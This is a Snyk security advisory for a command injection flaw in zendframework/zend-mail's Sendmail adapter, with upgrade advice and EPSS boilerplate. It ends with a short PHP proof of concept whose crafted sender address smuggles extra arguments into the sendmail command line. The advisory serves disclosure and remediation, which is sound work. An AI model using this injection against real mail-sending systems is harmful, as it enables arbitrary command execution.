Snyk has a published code exploit for this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade zendframework/zend-mail
to version 2.4.11, 2.7.2 or higher.
Affected versions of this package are vulnerable to Command Injection due to the setFrom
function in the Sendmail adapter. An attacker can execute arbitrary code by passing extra parameters to the mail command through a crafted e-mail address containing a backslash double quote.
use Zend\Mail;
$mail = new Mail\Message();
$mail->setBody('This is the text of the email.');
// inject additional parameters to sendmail command line
$mail->setFrom('"AAA\" params injection"@domain', 'Sender\'s name');
$mail->addTo('hacker@localhost', 'Name of recipient');
$mail->setSubject('TestSubject');
$transport = new Mail\Transport\Sendmail();
$transport->send($mail);